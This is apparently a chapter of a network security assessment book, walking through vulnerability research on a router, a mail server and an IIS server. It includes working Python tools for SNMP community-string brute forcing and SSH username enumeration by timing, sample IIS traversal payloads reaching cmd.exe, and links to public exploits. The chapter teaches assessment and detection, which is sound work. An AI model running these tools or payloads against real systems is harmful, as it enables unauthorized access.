After performing full TCP and UDP port scanning, along with initial investigation of accessible network services to qualify nmap results and obtain further useful information, you usually know enough to properly investigate known vulnerabilities.
Sites such as MITRE CVE, SecurityFocus, ISS X-Force, and Packet Storm provide bug details, along with publicly accessible exploit scripts. To fully qualify vulnerabilities by hand, you often need to use such tools. What follows is a breakdown of the results I obtained from these sites in relation to the accessible network services I identified in this case study.
Telnet, NTP, and SNMP services are accessible on the Cisco IOS 12.2.8 router at 192.168.10.1. Through checking MITRE CVE, SecurityFocus, and ISS X-Force, no remotely exploitable issues were identified that affect this version of IOS.
Therefore, the two particular threats to this Cisco IOS router are from:

- Telnet service password grinding
- SNMP service community string grinding
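SNMP community string grinding against an IOS device is worth showing in code, because SNMPv1 has no error reply for a wrong community: the agent simply stays silent, so "any reply at all" is the success signal. The following is an added example for this chapter, not a tool from the original text. It builds the SNMPv1 GetRequest for sysDescr.0 from raw BER and parses the GetResponse without an SNMP library; 192.168.10.1 is the router from the case study, while the wordlist and the reply built by build_get_response() are constructed so the parser can be exercised offline.

```python
"""SNMPv1 community-string grinder built from raw BER (no SNMP library needed).

Added example for this chapter, not a tool from the original text. The encoder
and decoder follow the SNMPv1 message format; the wordlist and the agent reply
made by build_get_response() are constructed for offline testing.
"""
import socket

SYSDESCR_OID = (1, 3, 6, 1, 2, 1, 1, 1, 0)  # SNMPv2-MIB::sysDescr.0

def _len(n):
    """BER length: short form below 128, else 0x80|count followed by big-endian bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def _tlv(tag, value):
    return bytes([tag]) + _len(len(value)) + value

def ber_int(n):
    """INTEGER in minimal two's-complement form."""
    return _tlv(0x02, n.to_bytes(max(1, (n.bit_length() + 8) // 8), "big", signed=True))

def ber_oid(arcs):
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128."""
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out += bytes(reversed(chunk))
    return _tlv(0x06, bytes(out))

def build_get_request(community, request_id, oid=SYSDESCR_OID):
    """SNMPv1 GetRequest: SEQUENCE { version 0, community, [0] { id, 0, 0, varbinds } }."""
    varbinds = _tlv(0x30, _tlv(0x30, ber_oid(oid) + b"\x05\x00"))  # { oid, NULL }
    pdu = _tlv(0xA0, ber_int(request_id) + ber_int(0) + ber_int(0) + varbinds)
    return _tlv(0x30, ber_int(0) + _tlv(0x04, community) + pdu)

def build_get_response(community, request_id, oid, value):
    """Constructed agent reply (GetResponse, tag 0xA2) used to test parse_response offline."""
    varbinds = _tlv(0x30, _tlv(0x30, ber_oid(oid) + _tlv(0x04, value)))
    pdu = _tlv(0xA2, ber_int(request_id) + ber_int(0) + ber_int(0) + varbinds)
    return _tlv(0x30, ber_int(0) + _tlv(0x04, community) + pdu)

def _read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the TLV at pos; handles long-form lengths."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def parse_response(msg, expect_id):
    """(community, error_status, [(oid, value)]) for a GetResponse to expect_id, else None."""
    tag, body, _ = _read_tlv(msg, 0)
    _, version, p = _read_tlv(body, 0)
    _, community, p = _read_tlv(body, p)
    ptag, pdu, _ = _read_tlv(body, p)
    if tag != 0x30 or version != b"\x00" or ptag != 0xA2:  # 0xA2 == GetResponse-PDU
        return None
    _, rid, p = _read_tlv(pdu, 0)
    _, status, p = _read_tlv(pdu, p)
    _, _, p = _read_tlv(pdu, p)  # error-index, unused here
    _, vblist, _ = _read_tlv(pdu, p)
    if int.from_bytes(rid, "big", signed=True) != expect_id:
        return None
    bindings, q = [], 0
    while q < len(vblist):
        _, vb, q = _read_tlv(vblist, q)
        _, oid, r = _read_tlv(vb, 0)
        _, val, _ = _read_tlv(vb, r)
        bindings.append((oid, val))
    return community, int.from_bytes(status, "big"), bindings

def grind(host, communities, port=161, timeout=1.0):
    """One GetRequest per candidate; SNMPv1 agents drop requests with a wrong
    community silently, so any GetResponse carrying our request-id means acceptance."""
    accepted = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        for i, community in enumerate(communities, start=1):
            rid = 0x1000 + i  # distinct id per probe so a late reply cannot be mismatched
            sock.sendto(build_get_request(community, rid), (host, port))
            try:
                parsed = parse_response(sock.recvfrom(4096)[0], rid)
            except (socket.timeout, IndexError):
                continue  # no reply (community rejected or filtered) or a junk datagram
            if parsed:
                accepted.append((community, parsed[2][0][1] if parsed[1] == 0 else None))
    return accepted

if __name__ == "__main__":
    WORDLIST = [b"public", b"private", b"cisco", b"secret", b"router"]  # constructed sample
    for community, sysdescr in grind("192.168.10.1", WORDLIST):
        print(f"community {community!r} accepted; sysDescr = {sysdescr!r}")
```

A community that is accepted but returns a non-zero error-status is still recorded (with no sysDescr value), since the agent only answers at all once the community has passed. Because silence is also what a filtered UDP/161 port looks like, confirm from the port scan that the service is reachable before reading "no reply" as "wrong community", and keep the per-probe timeout short but above the measured round-trip time.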
OpenSSH 3.1p1 and Sendmail 8.11.6 were found running on the Solaris 8 mail server at 192.168.10.10. Table 14-3 shows the remotely exploitable issues identified through checking MITRE CVE, SecurityFocus, and ISS X-Force databases for issues relating to OpenSSH 3.1p1.
CVE | BID | XFID | Notes
--- | --- | --- | ---
CVE-2002-0639 | 5093 | 9169 | OpenSSH 3.3 and prior contains vulnerabilities in challenge-response handling code.
CVE-2003-0190 | 7467 | 11902 | OpenSSH 3.6.1p1 and earlier, with PAM support enabled, allows remote attackers to determine valid usernames via a timing attack.
CVE-2003-0682 | N/A | 13214 | "Memory bugs" in OpenSSH 3.7.1 and prior.
CVE-2003-0693 | 8628 | 13191 | OpenSSH 3.7.1 and prior contains buffer management errors, resulting in denial of service or arbitrary code being executed.
CVE-2003-0695 | N/A | 13215 | OpenSSH 3.7.1 and prior contains further buffer management errors.
From investigating CVE-2002-0639 in more detail, I find that OpenSSH is only exploitable if SKEY or BSD_AUTH authentication methods are supported (default under OpenBSD 3.x). Two public exploits for this issue under OpenBSD have been released: although they don't remotely exploit Solaris hosts, they are available from:[1]
[1] URLs for tools in this book are mirrored at the O'Reilly site, http://examples.oreilly.com/networksa/tools.
Example 14-16 shows how to use the gobblessh patched OpenSSH client (from sshutup-theo.tar.gz, as discussed in Chapter 4) to check whether the remote host supports the SKEY or BSD_AUTH authentication mechanisms.

```
# ./gobblessh -l root 192.168.10.10 -M skey
[*] remote host supports ssh2
[*] server_user: root:skey
[*] keyboard-interactive method available
[x] bsdauth (skey) not available
Permission denied (publickey,password,keyboard-interactive).
# ./gobblessh -l root 192.168.10.10 -M bsdauth -S invalid
[*] remote host supports ssh2
[*] server_user: root:invalid
[*] keyboard-interactive method available
[x] bsdauth (invalid) not available
Permission denied (publickey,password,keyboard-interactive).
```
In this case, neither the SKEY nor the BSD_AUTH authentication mechanism is supported, so the CVE-2002-0639 challenge-response exploit won't be effective against this host.
CVE-2003-0190, on the other hand, relies on a timing bug in OpenSSH related to the PAM authentication mechanism. By searching Packet Storm and SecurityFocus for exploit scripts and tools, I find a useful tool, available at:
The recent memory bugs and buffer management issues identified in OpenSSH (CVE-2003-0682, CVE-2003-0693, and CVE-2003-0695) have no publicly available remote exploit scripts. Due to the way that these bugs are nested and rely on a number of variables for successful remote exploitation, it is unlikely that reliable exploits will be made publicly available.
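Before moving on to Sendmail, the CVE-2003-0190 timing attack is worth seeing in code, because the measurement and decision logic transfers to any authentication service that answers faster for unknown accounts. The following is an added example, not the tool referred to above. probe() times failed password logins over SSH and needs the third-party paramiko library (an assumption; it is imported only inside that function), while likely_valid() is pure Python and is exercised here on constructed measurements that stand in for probes against the mail server at 192.168.10.10.

```python
"""Username enumeration through the OpenSSH/PAM timing side channel (CVE-2003-0190).

Added example for this chapter, not the tool the text refers to. probe() needs
the third-party paramiko library (an assumption; it is imported only there),
while likely_valid() is pure Python and runs on the constructed SAMPLE below.
"""
import socket
import statistics
import time


def probe(host, username, attempts=5, port=22, password="x" * 32):
    """Time `attempts` password authentications that are expected to fail.
    A fresh transport per attempt keeps one failure from slowing the next."""
    import paramiko  # assumption: paramiko is installed
    samples = []
    for _ in range(attempts):
        sock = socket.create_connection((host, port), timeout=10)
        transport = paramiko.Transport(sock)
        transport.start_client()
        start = time.perf_counter()
        try:
            transport.auth_password(username, password)
        except paramiko.SSHException:
            pass  # failure is the expected outcome; only its duration matters
        samples.append(time.perf_counter() - start)
        transport.close()
    return samples


def likely_valid(timings, baseline_user, factor=3.0):
    """Return {username: delay over baseline} for names whose median response
    time stands out. baseline_user must be a name that certainly does not
    exist; the spread of its samples (median absolute deviation) sets the
    noise floor. For this bug the reported direction is slower == valid:
    with PAM, sshd still ran the password check for real accounts before
    answering, while unknown users were rejected straight away."""
    base = timings[baseline_user]
    base_med = statistics.median(base)
    noise = max(statistics.median([abs(x - base_med) for x in base]), 1e-3)
    flagged = {}
    for user, samples in timings.items():
        if user == baseline_user:
            continue
        delay = statistics.median(samples) - base_med
        if delay > factor * noise:
            flagged[user] = delay
    return flagged


# Constructed measurements (seconds) standing in for probe() output against 192.168.10.10.
SAMPLE = {
    "zq8vq2notauser": [0.102, 0.098, 0.105, 0.101, 0.099],  # baseline: certainly absent
    "root":           [1.21, 1.19, 1.24, 1.20, 1.22],
    "postmaster":     [0.104, 0.097, 0.100, 0.103, 0.101],
    "mailadm":        [1.18, 1.23, 1.20, 1.19, 1.25],
}

if __name__ == "__main__":
    # Live use: timings = {u: probe("192.168.10.10", u) for u in ["zq8vq2notauser", "root", ...]}
    for user, delay in sorted(likely_valid(SAMPLE, "zq8vq2notauser").items()):
        print(f"{user}: median {delay:.2f}s slower than baseline -> probably a real account")
```

Medians rather than means keep one retransmitted packet from creating a false positive, and the baseline user is re-probed alongside the candidates rather than once up front, so that drift in network latency during the run is measured rather than mistaken for a signal. The result is statistical: a name that is flagged should be confirmed by another route (finger, SMTP VRFY/EXPN, or the password-grinding step itself) before it goes into a report.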
Table 14-4 shows the remotely exploitable issues identified through checking MITRE CVE, SecurityFocus, and ISS X-Force databases for issues relating to Sendmail 8.11.6.
CVE | BID | XFID | Notes
--- | --- | --- | ---
CVE-2002-1337 | 6991 | 10748 | A buffer overflow in Sendmail 5.79 to 8.12.7 allows remote attackers to execute arbitrary code via certain formatted address fields, as processed by the crackaddr() function of headers.c.
CVE-2003-0161 | 7230 | 11653 | The prescan() function in Sendmail before 8.12.9 doesn't properly handle certain conversions from char and int types, causing denial of service or possible execution of arbitrary code.
CVE-2003-0694 | 8641 | 13204 | The prescan() function in Sendmail 8.12.9 allows remote attackers to execute arbitrary code.
The LSD security research team (http://www.lsd-pl.net) posted an excellent technical analysis and discussion of the CVE-2002-1337 crackaddr() bug. For the Sendmail service to be remotely exploitable, useful data (a value the process later relies on) must lie after the static buffer in which the overflow occurs, so that overwriting it disrupts the execution path; in testing, that disruption commonly shows up as a crash.
LSD found that on most Unix platforms, the static buffer isn't followed by such useful data. Their post to the BugTraq mailing list in March 2003 contained the low-level technical details, archived at http://www.securityfocus.com/archive/1/313757. In particular, they found that Solaris 8 running Sendmail 8.11.6 doesn't crash when provided with the malformed email address, and isn't, therefore, remotely exploitable.
At the time of writing, there are also no public tools or scripts to exploit the recent Sendmail 8.12.9 prescan() bugs (CVE-2003-0161 and CVE-2003-0694).
The two accessible ports on the Windows 2000 server at 192.168.10.25 are both IIS 5.0 web service instances. By enumerating the enabled IIS subsystems and components, you can look through MITRE CVE and other vulnerability lists in an efficient manner. Table 14-5 shows a list of known remotely exploitable security issues relating to this IIS server, as derived from MITRE CVE, SecurityFocus, and Microsoft security bulletin databases.
CVE | BID | Microsoft | Notes
--- | --- | --- | ---
CVE-2000-0884 | 1806 | MS00-078 | Unicode vulnerability allows remote attackers to read files outside the web root and possibly execute commands
CVE-2001-0241 | 2674 | MS01-023 | Remote msw3prt.dll ISAPI extension overflow through crafted requests to .printer files
CVE-2001-0333 | 2708 | MS01-026 | IIS superfluous decode vulnerability, very similar to Unicode, using double-encoded characters to traverse out of directories and possibly execute commands
CVE-2001-0500 | 2880 | MS01-033 | Remote idq.dll ISAPI extension overflow through requests for .ida and .idq files
CVE-2002-0079 | 4485 | MS02-018 | ASP chunked encoding overflow
CVE-2002-0147 | 4490 | MS02-018 | ASP chunked encoding overflow variant
CVE-2003-0109 | 7116 | MS03-007 | Remote ntdll.dll overflow through IIS 5.0, exploitable through WebDAV HTTP methods (such as SEARCH and PROPFIND)
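The two traversal entries in the table (CVE-2000-0884 and CVE-2001-0333) are the same mistake in two forms: IIS checked the request path for `..` before it had finished decoding it, once by accepting overlong UTF-8 such as `%c0%af` for `/`, and once by running the percent-decoder a second time so that `%255c` became `%5c` and then `\`. The following is an added example, not code from the original text or from Microsoft: it reproduces that decoding order and flags paths that climb above the web root, so it doubles as a check for IIS logs. The W3C-style log lines it runs over are constructed.

```python
"""Canonicalize IIS 5.0 request paths the way the Unicode (MS00-078) and
superfluous-decode (MS01-026) bugs did, and flag traversal out of the web root.

Added example for this chapter, not code from the original text. The sample
log lines below are constructed.
"""
from dataclasses import dataclass

HEX = set("0123456789abcdefABCDEF")

def percent_decode(s):
    """One pass of %XX decoding to raw bytes; malformed escapes are left alone."""
    out, i = bytearray(), 0
    while i < len(s):
        if s[i] == "%" and i + 2 < len(s) and s[i + 1] in HEX and s[i + 2] in HEX:
            out.append(int(s[i + 1:i + 3], 16))
            i += 3
        else:
            out += s[i].encode("utf-8", "surrogatepass")
            i += 1
    return bytes(out)

def lenient_utf8(data):
    """Decode like pre-MS00-078 IIS: overlong forms such as C0 AF are accepted as '/'.
    Returns (text, overlong_seen)."""
    out, i, overlong = [], 0, False
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            cp = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F)
            overlong |= cp < 0x80          # a 2-byte form for an ASCII character
            out.append(chr(cp)); i += 2
        elif 0xE0 <= b <= 0xEF and i + 2 < len(data) and all(0x80 <= x <= 0xBF for x in data[i + 1:i + 3]):
            cp = ((b & 0x0F) << 12) | ((data[i + 1] & 0x3F) << 6) | (data[i + 2] & 0x3F)
            overlong |= cp < 0x800         # a 3-byte form for a 1- or 2-byte character
            out.append(chr(cp)); i += 3
        else:
            out.append(chr(b)); i += 1     # ASCII, or a stray byte kept as Latin-1
    return "".join(out), overlong

@dataclass
class Canonical:
    path: str             # decoded, slash-normalized, '..' resolved
    escapes_root: bool    # a '..' tried to climb above the web root
    overlong_utf8: bool   # an overlong sequence such as %c0%af was decoded
    double_encoded: bool  # a second %XX pass changed the path (e.g. %255c)

def iis_canonicalize(request_target):
    path = request_target.split("?", 1)[0]
    first, overlong = lenient_utf8(percent_decode(path))
    # MS01-026: after the first decode (and the traversal check) IIS decoded again,
    # so %255c -> %5c -> '\' slipped past the filter.
    second_bytes = percent_decode(first)
    double = second_bytes != first.encode("utf-8", "surrogatepass")
    second, overlong2 = lenient_utf8(second_bytes)
    depth, escapes, parts = 0, False, []
    for seg in second.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if depth == 0:
                escapes = True             # climbing above the web root
            else:
                depth -= 1; parts.pop()
        else:
            depth += 1; parts.append(seg)
    return Canonical("/" + "/".join(parts), escapes, overlong or overlong2, double)

def flag_request(request_target):
    """Reasons a request path looks like one of the IIS decode bypasses (empty if clean)."""
    c = iis_canonicalize(request_target)
    return [why for hit, why in ((c.escapes_root, "traversal above web root"),
                                 (c.overlong_utf8, "overlong UTF-8 (MS00-078 style)"),
                                 (c.double_encoded, "double percent-encoding (MS01-026 style)")) if hit]

# Constructed W3C-style lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = [
    "2003-06-01 10:00:01 192.168.10.99 GET /scripts/tools/getdrvrs.exe - 200",
    "2003-06-01 10:00:07 192.168.10.99 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200",
    "2003-06-01 10:00:12 192.168.10.99 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200",
    "2003-06-01 10:00:20 192.168.10.77 GET /images/a%20b.gif - 200",
]

def scan_log(lines):
    """Return [(cs-uri-stem, reasons)] for log lines whose request path is flagged."""
    hits = []
    for fields in (line.split() for line in lines):
        reasons = flag_request(fields[4]) if len(fields) >= 7 else []
        if reasons:
            hits.append((fields[4], reasons))
    return hits

if __name__ == "__main__":
    for stem, reasons in scan_log(SAMPLE_LOG):
        print(f"{stem}: {', '.join(reasons)}")
```

Note that a single-encoded `..%5c..` is flagged as well: the detector canonicalizes all the way down regardless of which layer IIS happened to check, which is the property you want on the defensive side. On the offensive side the same canonicalization tells you which encoding a given request will turn into before you send it, so a traversal that "should" have worked can be debugged without guessing.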
After assembling a list of serious remotely exploitable vulnerabilities, visit Packet Storm, SecurityFocus, and underground web sites to assemble a toolkit. You can find the exploits at the following URLs, grouped by the Table 14-5 issue they target (each group ends with the SecurityFocus BID page for that issue).

Unicode directory traversal (CVE-2000-0884, BID 1806):

http://packetstormsecurity.org/0101-exploits/unitools.tgz
http://www.xfocus.org/exploits/200110/iissystem.zip
http://www.securityfocus.com/bid/1806/exploit/

msw3prt.dll .printer ISAPI extension overflow (CVE-2001-0241, BID 2674):

http://packetstormsecurity.org/0105-exploits/jill.c
http://packetstormsecurity.org/0111-exploits/IIS5-Koei.zip
http://www.securityfocus.com/bid/2674/exploit/

idq.dll .ida/.idq ISAPI extension overflow (CVE-2001-0500, BID 2880):

http://packetstormsecurity.org/0107-exploits/ida-exploit.sh
http://www.securityfocus.com/bid/2880/exploit/

ASP chunked encoding overflow (CVE-2002-0079, BID 4485):

http://www.securityfocus.com/data/vulnerabilities/exploits/DDK-IIS.c
http://www.securiteam.com/exploits/5YP011575W.html
http://www.securityfocus.com/bid/4485/exploit/

WebDAV ntdll.dll overflow (CVE-2003-0109, BID 7116):

http://packetstormsecurity.org/0303-exploits/rs_iis.c
http://www.securityfocus.com/data/vulnerabilities/exploits/KaHT_public.tar.gz
http://www.securiteam.com/exploits/5RP030KAAY.html
http://www.securityfocus.com/bid/7116/exploit/